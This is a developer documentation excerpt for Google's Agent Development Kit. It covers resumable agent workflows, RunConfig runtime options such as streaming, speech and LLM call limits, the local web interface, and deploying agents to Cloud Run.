  - **Blocking I/O:** For long-running synchronous I/O operations, the framework attempts to prevent stalls. Python ADK may use `asyncio.to_thread`, while Java ADK often relies on appropriate RxJava schedulers or wrappers for blocking calls. In TypeScript, the framework simply awaits the function; if a synchronous function performs blocking I/O, it will stall the event loop. Developers should use asynchronous I/O APIs (which return a `Promise`) whenever possible.
  - **CPU-Bound Work:** Purely CPU-intensive synchronous tasks will still block their execution thread in every environment.

Understanding these behaviors helps you write more robust ADK applications and debug issues related to state consistency, streaming updates, and asynchronous execution.

# Resume stopped agents

Supported in ADK: Python v1.14.0

An ADK agent's execution can be interrupted by various factors, including dropped network connections, power failure, or a required external system going offline. The Resume feature of ADK allows an agent workflow to pick up where it left off, avoiding the need to restart the entire workflow. In ADK Python 1.16 and higher, you can configure an ADK workflow to be resumable, so that it tracks the execution of the workflow and then allows you to resume it after an unexpected interruption.

This guide explains how to configure your ADK agent workflow to be resumable. If you use Custom Agents, you can update them to be resumable. For more information, see [Add resume to custom Agents](#custom-agents).

## Add resumable configuration

Enable the Resume function for an agent workflow by applying a Resumability configuration to the App object of your ADK workflow, as shown in the following code example:

```python
app = App(
    name='my_resumable_agent',
    root_agent=root_agent,
    # Set the resumability config to enable resumability.
    resumability_config=ResumabilityConfig(
        is_resumable=True,
    ),
)
```

Caution: Long Running Functions, Confirmations, Authentication

For agents that use [Long Running Functions](/adk-docs/tools-custom/function-tools/#long-run-tool), [Confirmations](/adk-docs/tools-custom/confirmation/), or [Authentication](/adk-docs/tools-custom/authentication/) requiring user input, adding a resumable configuration changes how these features operate. For more information, see the documentation for those features.

Note: Custom Agents

Resume is not supported by default for Custom Agents.
You must update the agent code for a Custom Agent to support the Resume feature. For information on modifying Custom Agents to support incremental resume functionality, see [Add resume to custom Agents](#custom-agents).

## Resume a stopped workflow

When an ADK workflow stops execution, you can resume it with a request that contains the Invocation ID of the workflow instance, which you can find in the [Event](/adk-docs/events/#understanding-and-using-events) history of the workflow. Make sure the ADK API server is running, in case it was interrupted or powered off, and then send a request like the following to resume the workflow:

```console
# restart the API server if needed:
adk api_server my_resumable_agent/

# resume the agent:
curl -X POST http://localhost:8000/run_sse \
  -H "Content-Type: application/json" \
  -d '{
    "app_name": "my_resumable_agent",
    "user_id": "u_123",
    "session_id": "s_abc",
    "invocation_id": "invocation-123"
  }'
```

You can also resume a workflow using the `run_async` method of the `Runner` object, as shown below:

```python
runner.run_async(user_id='u_123', session_id='s_abc', invocation_id='invocation-123')

# When new_message is set to a function response,
# we are trying to resume a long running function.
```

Note: Resuming a workflow from the ADK Web user interface or using the ADK command line (CLI) tool is not currently supported.

## How it works

The Resume feature works by logging completed Agent workflow tasks, including incremental steps, using [Events](/adk-docs/events/) and [Event Actions](/adk-docs/events/#detecting-actions-and-side-effects) to track the completion of agent tasks within a resumable workflow. If a workflow is interrupted and then later restarted, the system resumes the workflow by setting the completion state of each agent. If an agent did not complete, the workflow system reinstates any completed Events for that agent, and restarts the workflow from the partially completed state.
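The idea of reinstating logged results and re-running only unfinished work can be sketched in plain Python. This is a conceptual illustration only, not how ADK stores or replays Events: `run_workflow`, the `log` dictionary, and the step names are all hypothetical.

```python
from typing import Callable, Dict, List, Tuple


def run_workflow(steps: List[Tuple[str, Callable[[], str]]],
                 log: Dict[str, str]) -> List[str]:
    """Run steps in order, skipping any step whose result is already logged.

    Returns the names of the steps that actually executed in this call.
    """
    executed = []
    for name, fn in steps:
        if name in log:
            continue          # result already logged: reinstate, do not re-run
        log[name] = fn()      # run the step and log its result
        executed.append(name)
    return executed


attempts = {"c": 0}


def flaky_c() -> str:
    """Hypothetical step that fails on its first attempt only."""
    attempts["c"] += 1
    if attempts["c"] == 1:
        raise ConnectionError("simulated outage")
    return "c-done"


steps = [("a", lambda: "a-done"), ("b", lambda: "b-done"), ("c", flaky_c)]
log: Dict[str, str] = {}

try:
    run_workflow(steps, log)        # first run: a and b complete, c fails
except ConnectionError:
    pass

resumed = run_workflow(steps, log)  # resume: only c runs again
print(resumed)
```

On the second call, steps `a` and `b` are skipped because their results are already in the log, and only the step that failed is executed again.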
For multi-agent workflows, the specific resume behavior varies based on the multi-agent classes in your workflow, as described below:

- **Sequential Agent**: Reads the `current_sub_agent` from its saved state to find the next sub-agent to run in the sequence.
- **Loop Agent**: Uses the `current_sub_agent` and `times_looped` values to continue the loop from the last completed iteration and sub-agent.
- **Parallel Agent**: Determines which sub-agents have already completed and only runs those that have not finished.

Event logging includes results from Tools that successfully returned a result. So if an agent successfully executed Function Tools A and B, and then failed during execution of Tool C, the system reinstates the results from Tools A and B, and resumes the workflow by re-running the Tool C request.

Caution: Tool execution behavior

When resuming a workflow with Tools, the Resume feature ensures that the Tools in an agent are run ***at least once***, and they may run more than once when resuming a workflow. If your agent uses Tools where duplicate runs would have a negative impact, such as purchases, you should modify the Tool to check for and prevent duplicate runs.

Note: Workflow modification with Resume not supported

Do not modify a stopped agent workflow before resuming it. For example, adding or removing agents from a workflow that has stopped and then resuming that workflow is not supported.

## Add resume to custom Agents

Custom agents have specific implementation requirements in order to support resumability. You must decide on and define workflow steps within your custom agent, each of which produces a result that can be preserved before handing off to the next step of processing. The following steps outline how to modify a Custom Agent to support a workflow Resume.

- **Create CustomAgentState class**: Extend `BaseAgentState` to create an object that preserves the state of your agent.
- **Optionally, create WorkFlowStep class**: If your custom agent has sequential steps, consider creating a WorkFlowStep list object that defines the discrete, savable steps of the agent. - **Add initial agent state:** Modify your agent's async run function to set the initial state of your agent. - **Add agent state checkpoints**: Modify your agent's async run function to generate and save the agent state for each completed step of the agent's overall task. - **Add end of agent status to track agent state:** Modify your agent's async run function to include an `end_of_agent=True` status upon successful completion of the agent's full task. The following example shows the required code modifications to the example StoryFlowAgent class shown in the [Custom Agents](/adk-docs/agents/custom-agents/#full-code-example) guide: ```python class WorkflowStep(int, Enum): INITIAL_STORY_GENERATION = 1 CRITIC_REVISER_LOOP = 2 POST_PROCESSING = 3 CONDITIONAL_REGENERATION = 4 # Extend BaseAgentState ### class StoryFlowAgentState(BaseAgentState): ### step = WorkflowStep @override async def _run_async_impl( self, ctx: InvocationContext ) -> AsyncGenerator[Event, None]: """ Implements the custom orchestration logic for the story workflow. Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). """ agent_state = self._load_agent_state(ctx, WorkflowStep) if agent_state is None: # Record the start of the agent agent_state = StoryFlowAgentState(step=WorkflowStep.INITIAL_STORY_GENERATION) yield self._create_agent_state_event(ctx, agent_state) next_step = agent_state.step logger.info(f"[{self.name}] Starting story generation workflow.") # Step 1. 
Initial Story Generation if next_step <= WorkflowStep.INITIAL_STORY_GENERATION: logger.info(f"[{self.name}] Running StoryGenerator...") async for event in self.story_generator.run_async(ctx): yield event # Check if story was generated before proceeding if "current_story" not in ctx.session.state or not ctx.session.state[ "current_story" ]: return # Stop processing if initial story failed agent_state = StoryFlowAgentState(step=WorkflowStep.CRITIC_REVISER_LOOP) yield self._create_agent_state_event(ctx, agent_state) # Step 2. Critic-Reviser Loop if next_step <= WorkflowStep.CRITIC_REVISER_LOOP: logger.info(f"[{self.name}] Running CriticReviserLoop...") async for event in self.loop_agent.run_async(ctx): logger.info( f"[{self.name}] Event from CriticReviserLoop: " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event agent_state = StoryFlowAgentState(step=WorkflowStep.POST_PROCESSING) yield self._create_agent_state_event(ctx, agent_state) # Step 3. Sequential Post-Processing (Grammar and Tone Check) if next_step <= WorkflowStep.POST_PROCESSING: logger.info(f"[{self.name}] Running PostProcessing...") async for event in self.sequential_agent.run_async(ctx): logger.info( f"[{self.name}] Event from PostProcessing: " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event agent_state = StoryFlowAgentState(step=WorkflowStep.CONDITIONAL_REGENERATION) yield self._create_agent_state_event(ctx, agent_state) # Step 4. Tone-Based Conditional Logic if next_step <= WorkflowStep.CONDITIONAL_REGENERATION: tone_check_result = ctx.session.state.get("tone_check_result") if tone_check_result == "negative": logger.info(f"[{self.name}] Tone is negative. Regenerating story...") async for event in self.story_generator.run_async(ctx): logger.info( f"[{self.name}] Event from StoryGenerator (Regen): " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event else: logger.info(f"[{self.name}] Tone is not negative. 
Keeping current story.") logger.info(f"[{self.name}] Workflow finished.") yield self._create_agent_state_event(ctx, end_of_agent=True) ``` # Runtime Configuration Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 `RunConfig` defines runtime behavior and options for agents in ADK. It controls speech and streaming settings, function calling, artifact saving, and limits on LLM calls. When constructing an agent run, you can pass a `RunConfig` to customize how the agent interacts with models, handles audio, and streams responses. By default, no streaming is enabled and inputs aren’t retained as artifacts. Use `RunConfig` to override these defaults. ## Class Definition The `RunConfig` class holds configuration parameters for an agent's runtime behavior. - Python ADK uses Pydantic for this validation. - Go ADK has mutable structs by default. - Java ADK typically uses immutable data classes. - TypeScript ADK uses a standard interface, with type safety provided by the TypeScript compiler. ```python class RunConfig(BaseModel): """Configs for runtime behavior of agents.""" model_config = ConfigDict( extra='forbid', ) speech_config: Optional[types.SpeechConfig] = None response_modalities: Optional[list[str]] = None save_input_blobs_as_artifacts: bool = False support_cfc: bool = False streaming_mode: StreamingMode = StreamingMode.NONE output_audio_transcription: Optional[types.AudioTranscriptionConfig] = None max_llm_calls: int = 500 ``` ```typescript export interface RunConfig { speechConfig?: SpeechConfig; responseModalities?: Modality[]; saveInputBlobsAsArtifacts: boolean; supportCfc: boolean; streamingMode: StreamingMode; outputAudioTranscription?: AudioTranscriptionConfig; maxLlmCalls: number; // ... 
and other properties } export enum StreamingMode { NONE = 'none', SSE = 'sse', BIDI = 'bidi', } ``` ```go type StreamingMode string const ( StreamingModeNone StreamingMode = "none" StreamingModeSSE StreamingMode = "sse" ) // RunConfig controls runtime behavior. type RunConfig struct { // Streaming mode, None or StreamingMode.SSE. StreamingMode StreamingMode // Whether or not to save the input blobs as artifacts SaveInputBlobsAsArtifacts bool } ``` ```java public abstract class RunConfig { public enum StreamingMode { NONE, SSE, BIDI } public abstract @Nullable SpeechConfig speechConfig(); public abstract ImmutableList responseModalities(); public abstract boolean saveInputBlobsAsArtifacts(); public abstract @Nullable AudioTranscriptionConfig outputAudioTranscription(); public abstract int maxLlmCalls(); // ... } ``` ## Runtime Parameters | Parameter | Python Type | TypeScript Type | Go Type | Java Type | Default (Py / TS / Go / Java) | Description | | ------------------------------- | ------------------------------------------ | ------------------------------------- | --------------- | ----------------------------------------------------- | ---------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- | | `speech_config` | `Optional[types.SpeechConfig]` | `SpeechConfig` (optional) | N/A | `SpeechConfig` (nullable via `@Nullable`) | `None` / `undefined`/ N/A / `null` | Configures speech synthesis (voice, language) using the `SpeechConfig` type. | | `response_modalities` | `Optional[list[str]]` | `Modality[]` (optional) | N/A | `ImmutableList` | `None` / `undefined` / N/A / Empty `ImmutableList` | List of desired output modalities (e.g., Python: `["TEXT", "AUDIO"]`; Java/TS: uses structured `Modality` objects). 
| | `save_input_blobs_as_artifacts` | `bool` | `boolean` | `bool` | `boolean` | `False` / `false` / `false` / `false` | If `true`, saves input blobs (e.g., uploaded files) as run artifacts for debugging/auditing. | | `streaming_mode` | `StreamingMode` | `StreamingMode` | `StreamingMode` | `StreamingMode` | `StreamingMode.NONE` / `StreamingMode.NONE` / `agent.StreamingModeNone` / `StreamingMode.NONE` | Sets the streaming behavior: `NONE` (default), `SSE` (server-sent events), or `BIDI` (bidirectional). | | `output_audio_transcription` | `Optional[types.AudioTranscriptionConfig]` | `AudioTranscriptionConfig` (optional) | N/A | `AudioTranscriptionConfig` (nullable via `@Nullable`) | `None` / `undefined` / N/A / `null` | Configures transcription of generated audio output using the `AudioTranscriptionConfig` type. | | `max_llm_calls` | `int` | `number` | N/A | `int` | `500` / `500` / N/A / `500` | Limits total LLM calls per run. `0` or negative means unlimited. Exceeding language limits (e.g. `sys.maxsize`, `Number.MAX_SAFE_INTEGER`) raises an error. | | `support_cfc` | `bool` | `boolean` | N/A | `bool` | `False` / `false` / N/A / `false` | **Python/TypeScript:** Enables Compositional Function Calling. Requires `streaming_mode=SSE` and uses the LIVE API. **Experimental.** | ### `speech_config` Supported in ADKPython v0.1.0Java v0.1.0 Note The interface or definition of `SpeechConfig` is the same, irrespective of the language. Speech configuration settings for live agents with audio capabilities. The `SpeechConfig` class has the following structure: ```python class SpeechConfig(_common.BaseModel): """The speech generation configuration.""" voice_config: Optional[VoiceConfig] = Field( default=None, description="""The configuration for the speaker to use.""", ) language_code: Optional[str] = Field( default=None, description="""Language code (ISO 639. e.g. en-US) for the speech synthesization. 
Only available for Live API.""", ) ``` The `voice_config` parameter uses the `VoiceConfig` class: ```python class VoiceConfig(_common.BaseModel): """The configuration for the voice to use.""" prebuilt_voice_config: Optional[PrebuiltVoiceConfig] = Field( default=None, description="""The configuration for the speaker to use.""", ) ``` And `PrebuiltVoiceConfig` has the following structure: ```python class PrebuiltVoiceConfig(_common.BaseModel): """The configuration for the prebuilt speaker to use.""" voice_name: Optional[str] = Field( default=None, description="""The name of the prebuilt voice to use.""", ) ``` These nested configuration classes allow you to specify: - `voice_config`: The name of the prebuilt voice to use (in the `PrebuiltVoiceConfig`) - `language_code`: ISO 639 language code (e.g., "en-US") for speech synthesis When implementing voice-enabled agents, configure these parameters to control how your agent sounds when speaking. ### `response_modalities` Supported in ADKPython v0.1.0Java v0.1.0 Defines the output modalities for the agent. If not set, defaults to AUDIO. Response modalities determine how the agent communicates with users through various channels (e.g., text, audio). ### `save_input_blobs_as_artifacts` Supported in ADKPython v0.1.0Go v0.1.0Java v0.1.0 When enabled, input blobs will be saved as artifacts during agent execution. This is useful for debugging and audit purposes, allowing developers to review the exact data received by agents. ### `support_cfc` Supported in ADKPython v0.1.0Experimental Enables Compositional Function Calling (CFC) support. Only applicable when using StreamingMode.SSE. When enabled, the LIVE API will be invoked as only it supports CFC functionality. Experimental release The `support_cfc` feature is experimental and its API or behavior might change in future releases. ### `streaming_mode` Supported in ADKPython v0.1.0Go v0.1.0 Configures the streaming behavior of the agent. 
Possible values: - `StreamingMode.NONE`: No streaming; responses delivered as complete units - `StreamingMode.SSE`: Server-Sent Events streaming; one-way streaming from server to client - `StreamingMode.BIDI`: Bidirectional streaming; simultaneous communication in both directions Streaming modes affect both performance and user experience. SSE streaming lets users see partial responses as they're generated, while BIDI streaming enables real-time interactive experiences. ### `output_audio_transcription` Supported in ADKPython v0.1.0Java v0.1.0 Configuration for transcribing audio outputs from live agents with audio response capability. This enables automatic transcription of audio responses for accessibility, record-keeping, and multi-modal applications. ### `max_llm_calls` Supported in ADKPython v0.1.0Java v0.1.0 Sets a limit on the total number of LLM calls for a given agent run. - Values greater than 0 and less than `sys.maxsize`: Enforces a bound on LLM calls - Values less than or equal to 0: Allows unbounded LLM calls *(not recommended for production)* This parameter prevents excessive API usage and potential runaway processes. Since LLM calls often incur costs and consume resources, setting appropriate limits is crucial. ## Validation Rules Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 The `RunConfig` class validates its parameters to ensure proper agent operation. While Python ADK uses `Pydantic` for automatic type validation, Java and TypeScript ADK rely on their static type systems and may include explicit checks in the `RunConfig`'s constructor. For the `max_llm_calls` parameter specifically: 1. Extremely large values (like `sys.maxsize` in Python, `Integer.MAX_VALUE` in Java, or `Number.MAX_SAFE_INTEGER` in TypeScript) are typically disallowed to prevent issues. 1. Values of zero or less will usually trigger a warning about unlimited LLM interactions. 
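The two `max_llm_calls` rules above can be sketched with a small standard-library dataclass. This is a hedged illustration of the described behavior, not the `RunConfig` source: the `RunLimits` class and its messages are hypothetical, and the actual validator may differ in detail.

```python
import sys
import warnings
from dataclasses import dataclass


@dataclass
class RunLimits:
    """Hypothetical stand-in for the max_llm_calls field of RunConfig."""
    max_llm_calls: int = 500

    def __post_init__(self) -> None:
        # Rule 1: extremely large values are rejected.
        if self.max_llm_calls >= sys.maxsize:
            raise ValueError(
                f"max_llm_calls must be less than {sys.maxsize}."
            )
        # Rule 2: zero or negative values are allowed but trigger a warning.
        if self.max_llm_calls <= 0:
            warnings.warn(
                "max_llm_calls <= 0 allows an unbounded number of LLM calls.",
                stacklevel=2,
            )


limits = RunLimits(max_llm_calls=100)
print(limits.max_llm_calls)
```

Raising on the upper bound while only warning on the lower bound mirrors the distinction in the rules: an oversized limit is treated as a mistake, whereas an unbounded run is permitted but discouraged.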
### Basic runtime configuration

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

config = RunConfig(
    streaming_mode=StreamingMode.NONE,
    max_llm_calls=100
)
```

```typescript
import { RunConfig, StreamingMode } from '@google/adk';

const config: RunConfig = {
  streamingMode: StreamingMode.NONE,
  maxLlmCalls: 100,
};
```

```go
import "google.golang.org/adk/agent"

config := agent.RunConfig{
    StreamingMode: agent.StreamingModeNone,
}
```

```java
import com.google.adk.agents.RunConfig;
import com.google.adk.agents.RunConfig.StreamingMode;

RunConfig config = RunConfig.builder()
    .setStreamingMode(StreamingMode.NONE)
    .setMaxLlmCalls(100)
    .build();
```

This configuration creates a non-streaming agent with a limit of 100 LLM calls, suitable for simple task-oriented agents where complete responses are preferable.

### Enabling streaming

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

config = RunConfig(
    streaming_mode=StreamingMode.SSE,
    max_llm_calls=200
)
```

```typescript
import { RunConfig, StreamingMode } from '@google/adk';

const config: RunConfig = {
  streamingMode: StreamingMode.SSE,
  maxLlmCalls: 200,
};
```

```go
import "google.golang.org/adk/agent"

config := agent.RunConfig{
    StreamingMode: agent.StreamingModeSSE,
}
```

```java
import com.google.adk.agents.RunConfig;
import com.google.adk.agents.RunConfig.StreamingMode;

RunConfig config = RunConfig.builder()
    .setStreamingMode(StreamingMode.SSE)
    .setMaxLlmCalls(200)
    .build();
```

Using SSE streaming allows users to see responses as they're generated, providing a more responsive feel for chatbots and assistants.
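On the consuming side, a streamed response typically arrives as several partial chunks followed by one complete event. The sketch below simulates that pattern with the standard library only. `StreamEvent` and `fake_sse_stream` are hypothetical, and the assumption that the final event repeats the full text is made for illustration.

```python
import asyncio
from dataclasses import dataclass
from typing import AsyncGenerator, List, Tuple


@dataclass
class StreamEvent:
    """Hypothetical, simplified event: some text plus a `partial` flag."""
    text: str
    partial: bool


async def fake_sse_stream() -> AsyncGenerator[StreamEvent, None]:
    """Simulated stream: partial chunks, then one complete event."""
    for chunk in ["The capital ", "of France ", "is Paris."]:
        yield StreamEvent(text=chunk, partial=True)
    yield StreamEvent(text="The capital of France is Paris.", partial=False)


async def consume() -> Tuple[List[str], str]:
    shown: List[str] = []
    final = ""
    async for event in fake_sse_stream():
        if event.partial:
            shown.append(event.text)  # display progressively in the UI
        else:
            final = event.text        # complete response, safe to store
    return shown, final


shown, final = asyncio.run(consume())
print("".join(shown))
print(final)
```

A client written this way can render chunks as they arrive and still treat the single non-partial event as the authoritative result.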
### Enabling speech support ```python from google.genai.adk import RunConfig, StreamingMode from google.genai import types config = RunConfig( speech_config=types.SpeechConfig( language_code="en-US", voice_config=types.VoiceConfig( prebuilt_voice_config=types.PrebuiltVoiceConfig( voice_name="Kore" ) ), ), response_modalities=["AUDIO", "TEXT"], save_input_blobs_as_artifacts=True, support_cfc=True, streaming_mode=StreamingMode.SSE, max_llm_calls=1000, ) ``` ```typescript import { RunConfig, StreamingMode } from '@google/adk'; const config: RunConfig = { speechConfig: { languageCode: "en-US", voiceConfig: { prebuiltVoiceConfig: { voiceName: "Kore" } }, }, responseModalities: [ { modality: "AUDIO" }, { modality: "TEXT" } ], saveInputBlobsAsArtifacts: true, supportCfc: true, streamingMode: StreamingMode.SSE, maxLlmCalls: 1000, }; ``` ```java import com.google.adk.agents.RunConfig; import com.google.adk.agents.RunConfig.StreamingMode; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Modality; import com.google.genai.types.Part; import com.google.genai.types.PrebuiltVoiceConfig; import com.google.genai.types.SpeechConfig; import com.google.genai.types.VoiceConfig; RunConfig runConfig = RunConfig.builder() .setStreamingMode(StreamingMode.SSE) .setMaxLlmCalls(1000) .setSaveInputBlobsAsArtifacts(true) .setResponseModalities(ImmutableList.of(new Modality("AUDIO"), new Modality("TEXT"))) .setSpeechConfig( SpeechConfig.builder() .voiceConfig( VoiceConfig.builder() .prebuiltVoiceConfig( PrebuiltVoiceConfig.builder().voiceName("Kore").build()) .build()) .languageCode("en-US") .build()) .build(); ``` This comprehensive example configures an agent with: - Speech capabilities using the "Kore" voice (US English) - Both audio and text output modalities - Artifact saving for input blobs (useful for debugging) - Experimental CFC support enabled **(Python and TypeScript)** - SSE streaming for responsive interaction - A 
limit of 1000 LLM calls

### Enabling CFC Support

Supported in ADK: Python v0.1.0, TypeScript v0.2.0 (Experimental)

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

config = RunConfig(
    streaming_mode=StreamingMode.SSE,
    support_cfc=True,
    max_llm_calls=150
)
```

```typescript
import { RunConfig, StreamingMode } from '@google/adk';

const config: RunConfig = {
  streamingMode: StreamingMode.SSE,
  supportCfc: true,
  maxLlmCalls: 150,
};
```

Enabling Compositional Function Calling (CFC) creates an agent that can dynamically execute functions based on model outputs, which is useful for applications requiring complex workflows.

> **Experimental release:** The Compositional Function Calling (CFC) streaming feature is an experimental release.

# Use the Web Interface

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

The ADK web interface lets you test your agents directly in the browser. This tool provides a simple way to interactively develop and debug your agents.

> **Caution: ADK Web for development only.** ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only.

## Start the web interface

Use the following command to run your agent in the ADK web interface:

**Python**

```shell
adk web
```

**TypeScript**

```shell
npx adk web
```

**Go**

```shell
go run agent.go web api webui
```

**Java**

Make sure to update the port number.
With Maven, compile and run the ADK web server: ```console mvn compile exec:java \ -Dexec.args="--adk.agents.source-dir=src/main/java/agents --server.port=8080" ``` With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its plugins section: ```groovy plugins { id('java') // other plugins } ``` Then, elsewhere in the build file, at the top-level, create a new task: ```groovy tasks.register('runADKWebServer', JavaExec) { dependsOn classes classpath = sourceSets.main.runtimeClasspath mainClass = 'com.google.adk.web.AdkWebServer' args '--adk.agents.source-dir=src/main/java/agents', '--server.port=8080' } ``` Finally, on the command-line, run the following command: ```console gradle runADKWebServer ``` In Java, the Web Interface and the API server are bundled together. The server starts on `http://localhost:8000` by default: ```shell +-----------------------------------------------------------------------------+ | ADK Web Server started | | | | For local testing, access at http://localhost:8000. 
| +-----------------------------------------------------------------------------+ ``` ## Features Key features of the ADK web interface include: - **Chat interface**: Send messages to your agents and view responses in real-time - **Session management**: Create and switch between sessions - **State inspection**: View and modify session state during development - **Event history**: Inspect all events generated during agent execution ## Common options | Option | Description | Default | | ------------------------ | ---------------------------------- | ---------------------- | | `--port` | Port to run the server on | `8000` | | `--host` | Host binding address | `127.0.0.1` | | `--session_service_uri` | Custom session storage URI | In-memory | | `--artifact_service_uri` | Custom artifact storage URI | Local `.adk/artifacts` | | `--reload/--no-reload` | Enable auto-reload on code changes | `true` | ### Example with options ```shell adk web --port 3000 --session_service_uri "sqlite:///sessions.db" ``` # Deploying Your Agent Once you've built and tested your agent using ADK, the next step is to deploy it so it can be accessed, queried, and used in production or integrated with other applications. Deployment moves your agent from your local development machine to a scalable and reliable environment. ## Deployment Options Your ADK agent can be deployed to a range of different environments based on your needs for production readiness or custom flexibility: ### Agent Engine in Vertex AI [Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md) is a fully managed auto-scaling service on Google Cloud specifically designed for deploying, managing, and scaling AI agents built with frameworks such as ADK. Learn more about [deploying your agent to Vertex AI Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md). 
### Cloud Run

[Cloud Run](https://cloud.google.com/run) is a managed auto-scaling compute platform on Google Cloud that enables you to run your agent as a container-based application.

Learn more about [deploying your agent to Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/index.md).

### Google Kubernetes Engine (GKE)

[Google Kubernetes Engine (GKE)](https://cloud.google.com/kubernetes-engine) is Google Cloud's managed Kubernetes service, which allows you to run your agent in a containerized environment. GKE is a good option if you need more control over the deployment or want to run Open Models.

Learn more about [deploying your agent to GKE](https://google.github.io/adk-docs/deploy/gke/index.md).

### Other Container-friendly Infrastructure

You can manually package your agent into a container image and then run it in any environment that supports container images. For example, you can run it locally in Docker or Podman. This is a good option if you prefer to run offline or disconnected, or otherwise in a system that has no connection to Google Cloud.

Follow the instructions for [deploying your agent to Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/#deployment-commands). In the "Deployment Commands" section for gcloud CLI, you will find an example FastAPI entry point and Dockerfile.

# Deploy to Cloud Run

Supported in ADK: Python, Go, Java

[Cloud Run](https://cloud.google.com/run) is a fully managed platform that enables you to run your code directly on top of Google's scalable infrastructure.

To deploy your agent, you can use either the `adk deploy cloud_run` command *(recommended for Python)* or the `gcloud run deploy` command.

## Agent sample

For each of the commands, we will reference the `Capital Agent` sample defined on the [LLM agent](https://google.github.io/adk-docs/agents/llm-agents/index.md) page. We will assume it's in a directory (e.g., `capital_agent`).
To proceed, confirm that your agent code is configured as follows:

**Python**

1. Agent code is in a file called `agent.py` within your agent directory.
1. Your agent variable is named `root_agent`.
1. `__init__.py` is within your agent directory and contains `from . import agent`.
1. Your `requirements.txt` file is present in the agent directory.

**Go**

1. Your application's entry point (the main package and `main()` function) is in a single Go file. Using `main.go` is a strong convention.
1. Your agent instance is passed to a launcher configuration, typically using `agent.NewSingleLoader(yourAgent)`. The `adkgo` tool uses this launcher to start your agent with the correct services.
1. Your `go.mod` and `go.sum` files are present in your project directory to manage dependencies.

Refer to the following section for more details. You can also find a [sample app](https://github.com/google/adk-docs/tree/main/examples/go/cloud-run) in the GitHub repo.

**Java**

1. Agent code is in a file called `CapitalAgent.java` within your agent directory.
1. Your agent variable is global and follows the format `public static final BaseAgent ROOT_AGENT`.
1. Your agent definition is present in a static class method.

Refer to the following section for more details. You can also find a [sample app](https://github.com/google/adk-docs/tree/main/examples/java/cloud-run) in the GitHub repo.

## Environment variables

Set your environment variables as described in the [Setup and Installation](https://google.github.io/adk-docs/get-started/installation/index.md) guide.
```bash
export GOOGLE_CLOUD_PROJECT=your-project-id
export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location
export GOOGLE_GENAI_USE_VERTEXAI=True
```

*(Replace `your-project-id` with your actual GCP project ID)*

Alternatively, you can use an API key from AI Studio:

```bash
export GOOGLE_CLOUD_PROJECT=your-project-id
export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location
export GOOGLE_GENAI_USE_VERTEXAI=FALSE
export GOOGLE_API_KEY=your-api-key
```

*(Replace `your-project-id` with your actual GCP project ID and `your-api-key` with your actual API key from AI Studio)*

## Prerequisites

1. You should have a Google Cloud project. You need to know your:
    1. Project name (e.g., "my-project")
    1. Project location (e.g., "us-central1")
    1. Service account (e.g., "1234567890-compute@developer.gserviceaccount.com")
    1. GOOGLE_API_KEY

## Secret

Make sure you have created a secret that your service account can read.

### Entry for GOOGLE_API_KEY secret

You can create your secret manually or with the gcloud CLI:

```bash
echo "<>" | gcloud secrets create GOOGLE_API_KEY --project=my-project --data-file=-
```

### Permissions to read

Grant your service account permission to read this secret.

```bash
gcloud secrets add-iam-policy-binding GOOGLE_API_KEY --member="serviceAccount:1234567890-compute@developer.gserviceaccount.com" --role="roles/secretmanager.secretAccessor" --project=my-project
```

## Deployment payload

When you deploy your ADK agent workflow to Cloud Run, the following content is uploaded to the service:

- Your ADK agent code
- Any dependencies declared in your ADK agent code
- ADK API server code version used by your agent

The default deployment *does not* include the ADK web user interface libraries unless you request them with a deployment setting, such as the `--with_ui` option for the `adk deploy cloud_run` command.
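As a preflight step before running any deployment command, it can help to verify the variables from the Environment variables section. The following is a minimal sketch and not part of ADK: the `missing_env_vars` helper is hypothetical, and it assumes that Vertex AI mode needs the project and location while AI Studio mode needs `GOOGLE_API_KEY`, which is what the two export blocks suggest.

```python
import os
from typing import List, Mapping


def missing_env_vars(env: Mapping[str, str]) -> List[str]:
    """Return the names of variables that look unset for the chosen backend.

    Assumption: only the value "true" (case-insensitive) selects Vertex AI.
    """
    use_vertex = env.get("GOOGLE_GENAI_USE_VERTEXAI", "").strip().lower() == "true"
    if use_vertex:
        required = ["GOOGLE_CLOUD_PROJECT", "GOOGLE_CLOUD_LOCATION"]
    else:
        required = ["GOOGLE_API_KEY"]
    # Treat empty strings the same as unset variables.
    return [name for name in required if not env.get(name)]


if __name__ == "__main__":
    missing = missing_env_vars(os.environ)
    if missing:
        print("Missing environment variables: " + ", ".join(missing))
    else:
        print("Environment looks complete.")
```

Passing the environment in as a mapping keeps the check easy to test with plain dictionaries instead of the real process environment.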
